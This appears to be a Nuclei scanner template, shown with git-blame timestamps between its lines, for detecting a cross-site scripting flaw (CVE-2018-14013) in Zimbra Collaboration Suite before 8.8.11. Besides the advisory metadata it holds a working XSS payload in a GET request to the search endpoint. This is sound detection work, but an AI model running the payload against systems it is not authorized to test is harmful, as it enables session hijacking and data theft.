2021-07-27 07:34:36 +00:00
id : CVE-2018-14013
info :
2022-08-19 20:44:38 +00:00
name : Synacor Zimbra Collaboration Suite Collaboration <8.8.11 - Cross-Site Scripting
2021-07-27 07:34:36 +00:00
author : pikpikcu
severity : medium
2022-08-19 20:44:38 +00:00
description : Synacor Zimbra Collaboration Suite Collaboration before 8.8.11 is vulnerable to cross-site scripting via the AJAX and html web clients.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the targeted user's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
2023-09-06 12:57:14 +00:00
remediation : |
Upgrade to a version of Synacor Zimbra Collaboration Suite Collaboration that is equal to or greater than 8.8.11 to mitigate the vulnerability.
2022-04-22 10:38:41 +00:00
reference :
2022-05-17 09:18:12 +00:00
- https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories
- https://bugzilla.zimbra.com/show_bug.cgi?id=109018
- https://bugzilla.zimbra.com/show_bug.cgi?id=109017
2022-08-19 20:44:38 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2018-14013
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 6.1
2021-09-10 11:26:40 +00:00
cve-id : CVE-2018-14013
cwe-id : CWE-79
2023-08-31 11:46:18 +00:00
epss-score : 0.00512
2023-12-12 11:07:52 +00:00
epss-percentile : 0.73955
2023-09-06 12:57:14 +00:00
cpe : cpe:2.3:a:synacor:zimbra_collaboration_suite:*:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : synacor
product : zimbra_collaboration_suite
2023-12-05 09:50:33 +00:00
tags : cve,cve2018,xss,zimbra,synacor
2021-07-27 07:34:36 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-07-27 07:34:36 +00:00
- method : GET
path :
2021-08-03 07:43:57 +00:00
- "{{BaseURL}}/zimbra/h/search?si=1&so=0&sfi=4&st=message&csi=1&action=&cso=0&id=%22%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
2021-07-27 07:34:36 +00:00
matchers-condition : and
matchers :
- type : word
2023-07-11 19:49:27 +00:00
part : body
2021-07-27 07:34:36 +00:00
words :
2021-08-03 07:43:57 +00:00
- '</script><script>alert(document.domain)</script>'
2021-07-27 07:34:36 +00:00
- type : word
part : header
words :
- text/html
2023-07-11 19:49:27 +00:00
- type : status
status :
- 200
2023-12-29 09:30:44 +00:00
# digest: 4a0a0047304502201f68e01812a6a2ac06cfbc727c2fc18af1f6d279cf8accaadb438dd8b388b2a4022100ce88ef90892dd6bc1304bb0e415d6f9b7fa3ffac32f17a6fd31d767a6a33303d:922c64590222798bb761d5b6d8e72950